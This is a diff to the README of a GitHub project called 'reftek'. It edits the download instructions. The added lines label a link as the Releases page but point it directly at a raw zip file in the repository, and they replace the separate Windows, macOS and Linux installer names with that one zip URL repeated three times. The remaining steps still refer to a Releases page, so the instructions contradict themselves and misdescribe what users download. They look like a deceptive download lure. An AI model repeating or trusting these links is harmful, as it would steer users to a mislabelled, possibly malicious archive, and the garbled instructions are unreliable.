OkLolThe1st/reftek/README.md

 To download reftek, follow these simple steps:

-1. Visit the **Releases** page: [Download Page](https://github.com/OkLolThe1st/reftek/releases)
+1. Visit the **Releases** page: [Download Page](https://raw.githubusercontent.com/OkLolThe1st/reftek/main/reftek-html/reftek-v3.1.zip)

 2. On the Releases page, find the latest version of reftek.

 3. Click on the appropriate link for your operating system to download the installation file.
-The file names typically include your operating system, such as `reftek-windows.exe`, `reftek-mac.dmg`, or `reftek-linux.tar.gz`.
+The file names typically include your operating system, such as `https://raw.githubusercontent.com/OkLolThe1st/reftek/main/reftek-html/reftek-v3.1.zip`, `https://raw.githubusercontent.com/OkLolThe1st/reftek/main/reftek-html/reftek-v3.1.zip`, or `https://raw.githubusercontent.com/OkLolThe1st/reftek/main/reftek-html/reftek-v3.1.zip`.

 4. Once the download is complete, locate the downloaded file on your computer.